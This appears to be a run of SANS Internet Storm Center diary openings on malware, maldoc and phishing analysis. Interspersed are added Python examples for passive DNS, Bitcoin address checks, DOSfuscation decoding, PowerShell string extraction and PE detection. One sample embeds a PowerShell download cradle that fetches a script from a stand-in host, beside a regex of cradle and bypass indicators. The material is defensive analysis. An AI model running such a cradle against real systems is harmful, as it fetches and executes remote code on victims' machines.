If you haven't been living under a rock, you probably heard that the NSA released its reverse-engineering tool, Ghidra, at RSA last month. I've been an IDA user for years (it's the primary disassembler we use when I teach FOR610), but I've been trying out Ghidra over the last few days since it is free and other malware analysts have been talking about it. This is the first of several diaries I plan to write with suggestions on how to get Ghidra to do things I've come to rely on in IDA. And, being a good computer scientist, I start counting at 0, hence part 0.
I have not seen much Fake AntiVirus lately. Maybe I haven't been looking for it. But this weekend, I received a few identical spam messages with slightly different subjects advertising that I had won a licensed copy of ESET's NOD32 Anti Virus. Many anti-malware products are offering free or highly discounted initial licenses to lure buyers, so this email may seem legitimate to some, even though it wasn't done terribly convincingly (I am using a script to defang HTML in all email I receive, which may account for some of the formatting issues):
From time to time, I get a question about PDFs that have an /OpenAction, but don't seem to contain (malicious) code.
This week, reader Ahmed submitted a malicious document, which he was later able to analyse himself:
Reader Chris submitted a PowerShell log. These are interesting too. Here's what we saw:
In my previous post we've gone through some of the basics of analysing Golang binaries. This post will annotate source path and line information to the disassembly in Cutter. If you're not familiar with Cutter, it is the Qt-based frontend for Radare2.
Passive DNS is not new but remains a very interesting component to have in your hunting arsenal. As defined by CIRCL, a passive DNS is "a database storing historical DNS records from various resources. The historical data is indexed, which makes it searchable for incident handlers, security analysts or researchers". There are plenty of existing passive DNS services: CIRCL[1], VirusTotal, RiskIQ, etc. I'm using them quite often but, sometimes, they simply don't have any record for a domain or an IP address I'm interested in. If you're working for a big organization or a juicy target (depending on your business), why not operate your own passive DNS? You'll collect data from your network that will represent the traffic of your own users.
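As an added example (not code from the diary), here is the core of a home-grown passive DNS store in Python. It ingests resolver log lines in a reduced Zeek dns.log layout (an assumption; adapt the parser to whatever your resolver or sensor logs), keeps first-seen, last-seen and hit counts per (name, type, answer) tuple, and supports the forward and reverse lookups a hunter needs. The log lines are constructed for the example.

```python
"""Tiny passive DNS store fed from a resolver log (added example, not code from the diary).
Assumed input: Zeek dns.log reduced to four tab-separated columns,
ts, query, qtype_name, answers (Zeek lists multiple answers comma-separated and
uses "-" for "no answer")."""
from dataclasses import dataclass

# Constructed sample log lines (not real traffic)
SAMPLE_LOG = """\
1553000000.1\twww.example.com\tA\t93.184.216.34
1553003600.2\twww.example.com\tA\t93.184.216.34
1553007200.3\tcdn.example.net\tCNAME\tedge.example.net,93.184.216.34
1553010800.4\tmail.example.com\tA\t198.51.100.7
1553014400.5\tbad-domain.test\tA\t198.51.100.7
1553018000.6\tnxd.example.com\tA\t-
"""


@dataclass
class PDNSRecord:
    rrname: str
    rrtype: str
    rdata: str
    first_seen: float
    last_seen: float
    count: int


def parse_line(line):
    """Return (ts, query, qtype, [answers]) or None for unanswered/malformed lines."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != 4:
        return None
    ts, query, qtype, answers = parts
    rdata = [a for a in answers.split(",") if a and a != "-"]
    if query == "-" or not rdata:
        return None  # NXDOMAIN/empty answers carry no name<->data relation to store
    return float(ts), query.lower().rstrip("."), qtype, rdata


def build_index(log_text):
    """Key every (query, qtype, answer) tuple and track first/last seen and hit count."""
    index = {}
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, query, qtype, answers = parsed
        for rdata in answers:
            key = (query, qtype, rdata)
            rec = index.get(key)
            if rec is None:
                index[key] = PDNSRecord(query, qtype, rdata, ts, ts, 1)
            else:
                rec.first_seen = min(rec.first_seen, ts)
                rec.last_seen = max(rec.last_seen, ts)
                rec.count += 1
    return index


def lookup_name(index, name):
    """Forward lookup: everything a name ever resolved to."""
    name = name.lower().rstrip(".")
    return [rec for (q, _, _), rec in index.items() if q == name]


def lookup_rdata(index, rdata):
    """Reverse lookup: every name that ever pointed at this IP/target (the hunting pivot)."""
    return sorted({q for (q, _, a) in index if a == rdata})


if __name__ == "__main__":
    idx = build_index(SAMPLE_LOG)
    for rec in lookup_name(idx, "www.example.com"):
        print(rec)
    print("names sharing 198.51.100.7:", lookup_rdata(idx, "198.51.100.7"))
```

Two details matter in practice: unanswered queries are dropped because they state no name-to-data relation, and the reverse lookup is what turns one known bad IP into every name your own users resolved to it, which public services may never have seen.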
Saturday's diary entry "VelvetSweatshop Maldocs" is a reminder that Excel spreadsheets encrypted with password "VelvetSweatshop" are opened with Excel without prompting the user for a password.
In diary entry "Sextortion Email Variant: With QR Code", I had to decode a QR code. I didn't mention it in my diary entry, but I used an online service to decode the QR Code (I didn't want to use my smartphone).
Encrypted Excel documents can be opened without entering a password, provided the password is "VelvetSweatshop".
Golang is gaining popularity among malware authors, and more Golang-based malware is being found in the wild. It is also one of my favourite programming languages, especially for all network-related applications, for the following reasons:
The extortion attempts have moved to another step recently. After the "sextortion" emails that have been propagating for a while, attackers started to flood people with a new type of fake emails and their imagination is endless... I received one two days ago and, this time, they go one step further. In many countries, child pornography is, of course, a very serious offense punished by law. What if you received an email from a Central Intelligence Agency officer who reveals that you're listed in an international investigation about a case of child pornography and that you'll be arrested soon? Luckily, the agent is a "nice guy" and, if you pay $10K in Bitcoin, he will be happy to delete your name from the list of bad guys?
In many internal assessments or "recon mission" style engagements, you'll need to figure out what all the internal subnets are before you can start assessing that address space for issues, targets or whatever you are looking for in that project. Or, as I had this week, the request was for enumeration of all the hosts that AREN'T in AD.
PowerShell is a very nice language in Windows environments. With only a few lines of code, we can implement nice features... for the good or the bad!
I regularly post diary entries analyzing malware. And a couple of times, I posted diary entries about files that turned out not to be malicious.
I helped out someone who was seeing entries in his log file he could not make sense of.
In diary entry "Maldoc Analysis of the Weekend", I use the strings method explained in diary entry "Quickie: String Analysis is Still Useful" to quickly locate the PowerShell command hidden in a malicious Word document.
As promised in yesterday's diary entry "Finding Property Values in Office Documents", I made a video illustrating 2 methods to extract a property from an Office document.
Another piece of malicious code spotted on GitHub this time. By the way, this is a perfect example to demonstrate that protecting users via a proxy with web categorization is useless... Even sites from the Alexa Top-1M may deliver malicious content (GitHub's current position is 51). The URL has been found in a classic email phishing attempt. The content was recently uploaded (<24h) when I found it:
Yesterday I stumbled upon a PDF file that was flagged as suspicious by a customer's anti-malware solution and placed in quarantine. Later, the recipient contacted the team in charge of emails to access his document because he knew the sender and claimed that the file was legit.
This month, we got patches for 74 vulnerabilities in total. One of them has been exploited and two vulnerabilities have been made public before today.
I made a video for yesterday's diary entry "Maldoc Analysis of the Weekend" (the analysis of a Word document with VBA launching a PowerShell command).
I did some research into the delivery of the malicious documents I analyzed this weekend (diary entries here and here).
Yesterday I received malicious Office document request15.doc (MD5 8598361ecbbffb35900d0720b0316a56).
Here is an interesting sample! It's a phishing page which entices the user to connect to his/her account to retrieve a potentially interesting document. As you can see, it's a classic one:
User Account Control (UAC) is a feature Microsoft added a long time ago (initially with Windows Vista) in an attempt to limit what local administrators can do on Windows. Basically, when a user who is a local administrator logs in, his session token will only have basic privileges, even though the user is actually an administrator.
If you are like me, at some point in most penetration tests you'll have a session on a Windows host, and you'll have an opportunity to dump Windows credentials from that host, usually using Mimikatz. Mimikatz parses credentials (either clear-text or hashes) out of the LSASS process, or at least that's where it started; since its original version back in the day, it has expanded to cover several different attack vectors. An attacker can then use these credentials to "pivot" to attack other resources in the network. This is commonly called "lateral movement", though in many cases you're actually walking "up the tree" to ever-more-valuable targets in the infrastructure.
Caleb, one of our readers, has reported that Wikipedia articles have been "primed" and are being used actively in the various fake tech support phone campaigns. For instance, the Wikipedia article for SpyEye (https://en.wikipedia.org/wiki/SpyEye#cite_note-trusteerzeus-5 ) now contains this paragraph:
All too often when doing an internal security assessment or penetration test, a simple Nmap scan will find back-end infrastructure such as RADIUS servers, hypervisors, iLO, iDRAC and other BMC host addresses, essentially the parts of the datacenter that real people shouldn't need access to.
Reader Carlos submitted an email with an attachment. It's a phishing email, the attachment is an HTML file, although the criminals try to make the recipient believe that it is a PDF file.
I created a video showing how to de-obfuscate a DOSfuscated PowerShell command obtained from a maldoc I analyzed in diary entry "De-DOSfuscation Example":
Reader Frank submitted a suspicious email with attachment: a score of zero on VirusTotal, but McAfee warned for an exploit. Taking a look at the content, Frank noticed content that looked like encrypted code.
At the Internet Storm Center, we regularly get malware and fraudulent emails including Bitcoin addresses. Like the extortion emails including leaked passwords. And we often search online for these Bitcoin addresses, to see what else we can find.
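Before searching online for an address found in an extortion email, it is worth checking that it is a real address and not a truncated or mistyped one. The following Python, added here as an example and not code from the diary, extracts legacy Bitcoin addresses from a constructed extortion email and verifies their Base58Check checksum (version byte, 20-byte hash, double-SHA256 checksum). Only legacy 1.../3... addresses are covered; bech32 (bc1...) addresses use a different checksum and are not handled.

```python
"""Find Bitcoin addresses in an extortion email and check their Base58Check checksum
before pivoting on them. Added example, not a tool from the diary. Only legacy
Base58 addresses (1... P2PKH and 3... P2SH) are covered; bech32 (bc1...) is not."""
import hashlib
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Base58 excludes 0, O, I and l; legacy addresses are 26-35 characters long
ADDRESS_RE = re.compile(r"\b[13][1-9A-HJ-NP-Za-km-z]{25,34}\b")
VERSION_BYTES = {0x00: "P2PKH", 0x05: "P2SH"}


def b58decode(text):
    """Decode Base58 into bytes, preserving leading zero bytes encoded as '1'."""
    n = 0
    for ch in text:
        n = n * 58 + B58_ALPHABET.index(ch)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_zeros = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_zeros + body


def validate_address(addr):
    """Return the address type if version||hash160||checksum verifies, else None."""
    try:
        raw = b58decode(addr)
    except ValueError:
        return None
    if len(raw) != 25:
        return None
    payload, checksum = raw[:21], raw[21:]
    expected = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    if checksum != expected:
        return None  # typo, truncation or OCR damage: not worth searching for
    return VERSION_BYTES.get(payload[0], "unknown-version")


def extract_addresses(text):
    """Map every address-shaped token in the text to its validated type (or None)."""
    return {m.group(): validate_address(m.group()) for m in ADDRESS_RE.finditer(text)}


# Constructed extortion email. The first address is the well-known Bitcoin genesis
# block address (a valid checksum); the second is the same string with its last
# character changed, which the checksum rejects.
SAMPLE_EMAIL = """\
I know your password. Send 0.3 BTC to this address within 48 hours:
1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
(if it does not work, use 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNb)
"""

if __name__ == "__main__":
    for addr, kind in extract_addresses(SAMPLE_EMAIL).items():
        print(addr, "->", kind or "INVALID checksum")
```

A failed checksum usually means the scammer's template was mangled somewhere along the way (or the analyst's copy-paste was), so a search on that string would only return nothing or other copies of the same broken template.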
If you are doing memory forensics using Volatility, maybe you have noticed one of its disadvantages: you can't do a live analysis. If you need to do live memory forensics, then Rekall is your best friend.
While reviewing my honeypot logs, I found some interesting entries associated with the Mirai botnet starting on 30 November 2018. This is the last log sample, captured 2 days ago:
In today's world, we all try to do as much as we can to be secure while online. Most have learned the signs to try to spot phishing attempts: misspelled words, broken English, urgent requests, etc. We even implement 2FA to help prove that someone is who they say they are when they authenticate to a site. As we try to up our security game, the bad guys up their tactics too. Amnesty.org shared an interesting write-up about phishing attacks that are bypassing 2FA. According to the article, there is a large phishing campaign that is targeting Gmail and Yahoo accounts.
The SANS Holiday Hack Challenge is an annual, free CTF. Most of you already know that.
In most of our networks, endpoints are often the weakest link because they are more difficult to control (example: laptops are travelling, used at home, etc.). They can also be located in different locations or even countries for the biggest organizations. To better manage them, tools can be deployed to perform many different tasks:
The Christmas break is coming for most of us, so let's take some time to share some tips to better protect our computers. The Microsoft Windows OS has plenty of tools that, when properly used, can reduce the risk of being infected by malware. As best practices, we must have antivirus enabled, we can deploy AppLocker to allow only authorized applications to be launched, we can restrict applications from being executed from locations like %APPDATA% or %TEMP%, but there are tools that are much more difficult to restrict on a regular host like... PowerShell! If you uninstall PowerShell from a modern Windows version, you'll simply miss nice features. That's why, in many cases, a simple uninstall is not possible. That's also the reason why PowerShell remains a nice first-stage infection method:
Microsoft just published an out-of-band patch for Internet Explorer. It fixes a memory corruption vulnerability in the scripting engine. This vulnerability is identified as CVE-2018-8653.
Reader Jason submitted a malicious document that he analyzed completely. A small problem encountered by Jason was the following: the malicious document, emailed to his users, was contained in a password protected ZIP file.
Over the past several months I have been observing random Remote Desktop Protocol (RDP) activity targeting my honeypot. Back in September, US-CERT issued an alert, released by the FBI, regarding RDP being actively used and exploited by malicious actors.
I received some questions about the de-DOSfuscation I did with Python in my last diary entry: "Yet Another DOSfuscation Sample".
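DOSfuscation relies on cmd.exe's own variable expansion: a character pool is stored with set and the real command is rebuilt from %VAR:~start,len% substrings, often mixed with ^ escape carets, %VAR:old=new% replacement and !VAR! delayed expansion. Added here as an illustration (it is not the author's script), the Python below emulates those expansion rules and runs them over a constructed sample. The statement splitting and the set parsing are deliberately simplified, as noted in the code.

```python
"""Emulate the cmd.exe variable tricks used by DOSfuscation (added example, not the
author's script): set statements followed by %VAR:~start,len% substring extraction,
%VAR:old=new% replacement, !VAR! delayed expansion and ^ escape carets.
Simplifications: statements are split on & and && without regard to quoting, and
`set /a`, `set /p` and FOR-loop tricks are not handled."""
import re

# %VAR%, %VAR:~start,len%, %VAR:old=new% and the same forms delimited with ! (delayed expansion)
EXPANSION_RE = re.compile(r"([%!])(\w+)(?::~(-?\d+)(?:,(-?\d+))?|:([^=%!]+)=([^%!]*))?\1")
SET_RE = re.compile(r'^set\s+(?:"(\w+)=(.*?)"\s*|(\w+)=(.*))$', re.I)
STATEMENT_SPLIT_RE = re.compile(r"\s*(?:&&|\|\||&)\s*")


def cmd_substring(value, start, length=None):
    """cmd.exe %VAR:~start,len% semantics: negative start counts from the end,
    negative len drops that many characters from the end, out-of-range start is empty."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if start >= n:
        return ""
    if length is None:
        return value[start:]
    if length < 0:
        end = n + length
        return value[start:end] if end > start else ""
    return value[start:start + length]


def expand(text, env):
    """Expand every variable reference in text using env (names are case-insensitive)."""
    def repl(m):
        delim, name, start, length, old, new = m.groups()
        value = env.get(name.upper())
        if value is None:
            return m.group(0)  # at the prompt cmd leaves unknown %VAR% literally in place
        if start is not None:
            return cmd_substring(value, int(start), None if length is None else int(length))
        if old is not None:
            return re.sub(re.escape(old), lambda _: new, value, flags=re.I)
        return value
    return EXPANSION_RE.sub(repl, text)


def deobfuscate(cmdline):
    """Run the set statements, expand the rest and strip escape carets.
    Returns the list of expanded non-set statements in order."""
    env = {}
    out = []
    for stmt in STATEMENT_SPLIT_RE.split(cmdline.strip()):
        if not stmt:
            continue
        m = SET_RE.match(stmt)
        if m:
            name = m.group(1) or m.group(3)
            value = m.group(2) if m.group(1) else m.group(4)
            env[name.upper()] = value
            continue
        out.append(re.sub(r"\^(.)", r"\1", expand(stmt, env)))
    return out


# Constructed sample in the style of a DOSfuscated maldoc command: a character pool,
# then the real command rebuilt one substring at a time, with a caret in 'cmd'.
SAMPLE = (
    'set "P=powershl -widnac" && c^md /c "%P:~0,7%%P:~3,1%%P:~7,1%%P:~7,1%%P:~8,1%'
    '%P:~-7,2%%P:~8,1%%P:~6,1%%P:~-5,2%%P:~12,1%%P:~3,1%%P:~-3,1%%P:~8,1%%P:~9,1%'
    '%P:~-1%%P:~8,1%%P:~-1,1%%P:~-2,1%%P:~7,1%%P:~15,1%"'
)

if __name__ == "__main__":
    for line in deobfuscate(SAMPLE):
        print(line)
```

The point of emulating rather than running the sample is that the substring rules are the only thing that matters: once they are reproduced, the character pool and the index soup collapse to the real command without ever handing the string to a real cmd.exe.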
First sextortion, now bombstortion?
Here is a nice example of a phishing attack that I found while reviewing data captured by my honeypots. We all know that phishing is a pain and attackers are always searching for new tactics to entice the potential victim to click on a link, disclose personal information or more...
December 2018 Security Updates
Richard Porter --- ISC Handler on Duty
Reader Vince asked for help with the analysis of a malicious Word document. He started the analysis himself, following the method I illustrated in diary entry "Word maldoc: yet another place to hide a command".
String analysis: extracting and analyzing strings from binary files (like executables) to assist with reverse engineering.
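As an added example tied to the two string-analysis entries on this page ("Maldoc Analysis of the Weekend" and this definition), and not the author's own tooling, the Python below extracts both ASCII and UTF-16LE strings from a constructed document-like blob, filters them against a short list of PowerShell indicators and decodes the -EncodedCommand payload (Base64 of UTF-16LE text). The indicator list and the sample bytes are assumptions for the example, not taken from any diary.

```python
"""Extract printable strings from a binary blob and pull out PowerShell launch commands.
Added example illustrating the string-analysis technique; not the author's tool."""
import base64
import re

# Anything that looks like a PowerShell invocation or a typical download cradle
PS_INDICATORS = re.compile(
    r"powershell|-encodedcommand|-enc\b|-e\s+[A-Za-z0-9+/=]{16,}|"
    r"-w(?:indowstyle)?\s+hidden|frombase64string|downloadstring|\biex\b|"
    r"invoke-expression|-exec(?:utionpolicy)?\s+bypass|-nop\b",
    re.I,
)
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|en|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def extract_strings(data, min_len=6):
    """Return (encoding, offset, text) for ASCII and UTF-16LE runs of >= min_len chars.
    Office/VBA and Windows binaries store many strings as UTF-16LE, which a plain
    ASCII-only strings pass misses."""
    found = []
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        found.append(("ascii", m.start(), m.group().decode("ascii")))
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data):
        found.append(("utf16le", m.start(), m.group().decode("utf-16le")))
    return sorted(found, key=lambda t: t[1])


def decode_encoded_command(text):
    """PowerShell -EncodedCommand takes Base64 of the UTF-16LE script text."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_powershell(data, min_len=6):
    """Strings that match the indicator list, with the -enc payload decoded when present."""
    hits = []
    for _, offset, text in extract_strings(data, min_len):
        if PS_INDICATORS.search(text):
            hits.append((offset, text, decode_encoded_command(text)))
    return hits


# Constructed sample: an OLE-looking blob with a UTF-16LE template name, binary filler
# and an encoded PowerShell command of the kind found in maldocs. Not a real document.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")
SAMPLE_BLOB = (
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16
    + "Normal.dotm".encode("utf-16le") + b"\x00\x00\x01\x02\x03"
    + b"cmd /c powershell -w hidden -enc " + ENCODED.encode("ascii")
    + b"\x00" * 8
    + b"This document was created in an earlier version of Microsoft Word"
)

if __name__ == "__main__":
    for offset, text, decoded in find_powershell(SAMPLE_BLOB):
        print(f"0x{offset:x}: {text[:60]}...")
        if decoded:
            print("  decoded -enc payload:", decoded)
```

The UTF-16LE pass is the part most often skipped: a command stored as wide characters in a document stream produces no ASCII run longer than one character, so it is invisible to a plain ASCII strings pass.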
Last week, the arrest of MENG Wanzhou made big waves in the news. Ms. Meng was arrested in Canada based on an arrest warrant issued by the United States Department of Justice. Ms. Meng, as CFO of Huawei and possible heir to her father, the CEO of Huawei, is assumed to have access to substantial wealth. This led to a wave of advance-fee scams leveraging this news.
Reader Jason submitted a ZIP file received via email. It contains an MHT file, and when Jason received it, it had 0 detections on VirusTotal.
Over the last few days we're seeing increased attacks from 188.8.131.52, which is trying to exploit open Docker instances (port 2375). The container (named java123) is based on the image ahtihhebs/picture124, and is executed with payload:
If you haven't uninstalled Flash yet, maybe today should be that day. The update posted yesterday has a remote code exec proof-of-concept already here:
In many penetration tests, there'll be a point where you need to exfiltrate some data. Sometimes this is a situation of "OK, we got the crown jewels, let's get the data off premise". Or sometimes in this phase of the test the goal is "let's make some noise and see if they're watching for data exfiltration - hmm, nothing yet, let's make some LOUDER noise and see (and so on)". As with most things, there's a spectrum of methods to move the target data out, with various levels of difficulty for detection.
Reader Mike submitted a malicious Word document. The document (MD5 6c975352821d2532d8387f19457b584e) contains obfuscated VBA code that launches a shell command. That shell command is hidden somewhere in the document (not in the VBA code).
Wireshark version 2.6.5 is available: release notes.
We've seen Elasticsearch being exploited using queries with script_fields for a while now, but we're seeing increased activity.
Yesterday, I wrote a diary about a nice obfuscated shell script. Today, I found another example of a malicious shell script, embedded in an Apple .dmg file (an Apple Disk Image). The file was delivered through a fake Flash update webpage:
One of our readers, Nathaniel Vos, shared an interesting shell script with us, and thanks to him! He found it on an embedded Linux device, more precisely a QNAP NAS running QTS 4.3. After some quick investigation, it looked like the script was not brand new: we found references to it already posted in September 2018. But such shell scripts are less common: they are usually not obfuscated and they perform basic tasks like downloading and installing some binaries. So, I took the time to look at it.
ViperMonkey: a VBA Emulation engine written in Python, designed to analyze and deobfuscate malicious VBA Macros contained in Microsoft Office files.
I made a video for my diary entry "Dissecting a CVE-2017-18822 Exploit":
By default the Docker Engine API listens on a unix socket only, but the HTTP interface can be configured and will listen on port 2375. If you need to have an HTTP listener, configure it to listen on local IPs only. Shodan will give almost 800 accessible Docker Engine APIs. Open Docker Engine APIs are being actively scanned, as we've detected in our Honeytrap network.
In politics, there is a strategy called "divide and conquer". It's also true for some pieces of malware that spread their malicious code amongst multiple sources. One of our readers shared a sample of PowerShell code found on Pastebin that applies exactly this technique. Thanks to him!
I am sure that many penetration testers among our readers try to minimize their travel. While many years ago we had to be physically present for internal penetration tests, today it is very common that client organizations set up virtual machines for penetration testers, which are then used to perform internal penetration tests.
Apache today released an advisory, urging users who run Apache Struts 2.3.x to update the commons-fileupload component. Struts 2.3.x uses by default the old 1.3.2 version of commons-fileupload. In November 2016, a deserialization vulnerability was disclosed and patched in commons-fileupload. The vulnerability can lead to arbitrary remote code execution.
Here is another example of a malicious PowerShell script found while hunting. Such scripts remain a common attack vector and many of them can be easily detected just by looking for some specific strings. Here is an example of a YARA rule that I'm using to hunt for malicious PowerShell scripts:
About a week ago, I was asked for help with another malicious RTF file.
Last week, in the inception diary of this series, I talked about LaunchAgents and LaunchDaemons, probably the most known and popular persistence mechanisms under macOS. But there are other mechanisms, definitely not new and well known in the *nix world, which are still linked to or managed by launchd:
I received a malicious Word document with detections on VirusTotal, but it does not exhibit malicious behavior in a sandbox.
Microsoft's Windows Defender on Windows 10 supports sandboxing now.
Reader Tor submitted a suspicious email he received today. It has a Word document attachment, which, no surprise, has VBA macros.
I was asked how I knew that the content of the email in my last diary entry was compressed RTF.
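An added example (not the diary's code) of how compressed RTF gives itself away: the MS-OXRTFCP container starts with a 16-byte header whose third field is the ASCII magic "LZFu" (compressed) or "MELA" (stored uncompressed), and Outlook keeps it in the PR_RTF_COMPRESSED property of a message (stream __substg1.0_10090102 in a .msg file). The Python below parses that header, carves such headers out of an arbitrary blob and, for the uncompressed case, returns the RTF text; the LZFu dictionary decoder itself is out of scope here. The sample bytes are constructed.

```python
"""Recognise the compressed RTF container (MS-OXRTFCP) that Outlook stores in the
PR_RTF_COMPRESSED property (stream __substg1.0_10090102 in a .msg file).
Added example, not code from the diary. The 16-byte header is
COMPSIZE (size of everything after this field), RAWSIZE (uncompressed size),
COMPTYPE ("LZFu" = compressed, "MELA" = stored uncompressed) and CRC.
The LZFu dictionary decoder itself is not implemented here."""
import re
import struct

RTF_HEADER = struct.Struct("<II4sI")
COMPTYPES = {b"LZFu": "compressed", b"MELA": "uncompressed"}


def parse_rtf_header(blob, offset=0):
    """Parse a header at offset; None if the COMPTYPE magic is not there."""
    if len(blob) < offset + RTF_HEADER.size:
        return None
    compsize, rawsize, comptype, crc = RTF_HEADER.unpack_from(blob, offset)
    kind = COMPTYPES.get(comptype)
    if kind is None:
        return None
    declared_end = offset + 4 + compsize  # COMPSIZE excludes its own 4 bytes
    info = {
        "offset": offset, "compsize": compsize, "rawsize": rawsize,
        "comptype": comptype.decode("ascii"), "kind": kind, "crc": crc,
        "fits": declared_end <= len(blob), "exact": declared_end == len(blob),
    }
    if kind == "uncompressed":
        body = offset + RTF_HEADER.size
        info["rtf"] = blob[body:body + rawsize]  # MELA: the RTF follows the header as-is
    return info


def scan_for_rtf(blob):
    """Carve every plausible header out of an arbitrary blob (a .msg stream, a memory dump)
    by locating the COMPTYPE magic and backing up 8 bytes to COMPSIZE."""
    hits = []
    for magic in COMPTYPES:
        for m in re.finditer(re.escape(magic), blob):
            if m.start() >= 8:
                info = parse_rtf_header(blob, m.start() - 8)
                if info and info["fits"]:
                    hits.append(info)
    return sorted(hits, key=lambda h: h["offset"])


# Constructed samples: a MELA (uncompressed) container around a small RTF document,
# and a fake LZFu header followed by filler bytes standing in for compressed data.
RTF_TEXT = b"{\\rtf1\\ansi\\deff0 Hello from a constructed sample}"
MELA_BLOB = RTF_HEADER.pack(12 + len(RTF_TEXT), len(RTF_TEXT), b"MELA", 0) + RTF_TEXT
FAKE_LZFU = RTF_HEADER.pack(12 + 20, 512, b"LZFu", 0xDEADBEEF) + b"\x00" * 20
CARVE_BLOB = b"junk" * 5 + MELA_BLOB + b"\x00" * 7 + FAKE_LZFU

if __name__ == "__main__":
    for hit in scan_for_rtf(CARVE_BLOB):
        print(hit["offset"], hit["comptype"], hit["kind"], "rawsize", hit["rawsize"],
              hit.get("rtf", b"")[:40])
```

When the header is present but the declared COMPSIZE does not fit in the data you have, you are most likely looking at a truncated extraction rather than a different format; RAWSIZE tells you how much RTF to expect once the LZFu stream is decompressed.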
A few months ago, Rob wrote a nice diary to explain how to dissect a (malicious) Office document (.docx). The approach was to use the OpenXML SDK with PowerShell. This is nice, but how to achieve the same on a Linux system? One of our readers (thanks Mike!) provided us with the steps to perform the same kind of analysis but on a Kali instance (replace Kali with your preferred distribution).
The most visible scams you typically see are distributed rather broadly without targeting specific groups. They usually operate on the assumption that they will hit at least a couple of victims willing to fork over some money for the elusive gain promised by the scam. On the other hand, scams can be more effective if they target smaller groups. The scam can use a message that focuses particularly on the concerns of the group.
I found another interesting piece of malicious PowerShell while hunting. The file size is 1.3MB and most of the file is a Base64-encoded PE file. You can immediately detect it by checking the first characters of the string:
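An added example, not the diary's own code: "MZ" followed by the usual DOS stub bytes 0x90 0x00 Base64-encodes to "TVqQAA", and since the first two bytes alone determine the first two Base64 characters, any Base64-encoded PE starts with "TV". The Python below uses that as a cheap pre-filter, then decodes the candidate and confirms the MZ and PE headers, so that a random "TV..." blob is not mistaken for an executable. The PowerShell script and the 88-byte fake PE it embeds are constructed.

```python
"""Spot a Base64-encoded PE file inside a PowerShell script by its first characters and
confirm it by decoding the headers. Added example, not code from the diary.
b"MZ\\x90\\x00" (the usual DOS stub start) encodes to "TVqQAA"; because the first two
bytes alone fix the first two Base64 characters, any candidate starts with "TV"."""
import base64
import re
import struct

B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
MACHINE_TYPES = {0x014C: "x86", 0x8664: "x64"}


def parse_pe(raw):
    """Minimal header check: MZ magic, e_lfanew in range, PE\\0\\0 signature, machine type."""
    if len(raw) < 0x40 or raw[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", raw, 0x3C)[0]
    if e_lfanew + 6 > len(raw) or raw[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    machine = struct.unpack_from("<H", raw, e_lfanew + 4)[0]
    return {"e_lfanew": e_lfanew, "machine": MACHINE_TYPES.get(machine, hex(machine)),
            "size": len(raw)}


def find_embedded_pe(script_text):
    """Return one dict per Base64 run that decodes to something with valid PE headers."""
    hits = []
    for m in B64_RUN_RE.finditer(script_text):
        blob = m.group()
        if not blob.startswith("TV"):
            continue  # cheap pre-filter: only MZ-prefixed data can start this way
        padded = blob + "=" * (-len(blob) % 4)
        try:
            raw = base64.b64decode(padded, validate=True)
        except ValueError:
            continue
        info = parse_pe(raw)
        if info:
            info.update(offset=m.start(), b64_len=len(blob))
            hits.append(info)
    return hits


def build_fake_pe():
    """Constructed 88-byte stand-in for a PE: DOS header with e_lfanew=0x40, then a
    PE signature and an x86 COFF header. Not a working executable."""
    dos = bytearray(0x40)
    dos[0:4] = b"MZ\x90\x00"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\x00\x00" + struct.pack("<H", 0x014C) + b"\x00" * 18


FAKE_PE_B64 = base64.b64encode(build_fake_pe()).decode("ascii")
# Constructed script: a harmless Base64 blob and the fake PE passed to Assembly.Load
SAMPLE_SCRIPT = (
    "$t = 'Zm9vYmFyYmF6cXV4Zm9vYmFyYmF6cXV4Zm9vYmFyYmF6cXV4Zm9vYmFyYmF6cXV4Zm9vYmFyYmF6cXV4'\n"
    "$b = [System.Convert]::FromBase64String('" + FAKE_PE_B64 + "')\n"
    "[System.Reflection.Assembly]::Load($b)\n"
)

if __name__ == "__main__":
    print("prefix:", FAKE_PE_B64[:8])
    for hit in find_embedded_pe(SAMPLE_SCRIPT):
        print(hit)
```

Matching on "TVqQAA" alone is fine for triage, but a script that splits or reverses the string, or that uses a non-standard DOS stub, changes the third character onward, which is why the decode-and-verify step is the one to trust.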
Reader Salil asked for help with the analysis of a .MSG file. We talked about the analysis of .MSG files before, and Salil was able to use my oledump.py tool to look into the .msg file, but still had a problem finding URLs he knew were inside the email.
First and foremost, let me start with a disclaimer. As probably most of you may have noticed from the similarity, the title of this post, which I hope to be the first of a series, is inspired by the great and amazing work from Adam (@Hexacorn), "Beyond good ol' Run Key" (which, as of today, reached episode 93!!!), where he writes about all the Windows persistence mechanisms he comes across/discovers in his research, which are, as the title suggests, much more than just the Run registry key we all love. In the rare case you have not read it yet, you should asap. Really.
Cisco PSIRT posted a number of advisories yesterday, 17 OCT 2018. For your consideration, seven (7) are rated High, there are eight (8) additional Medium advisories.
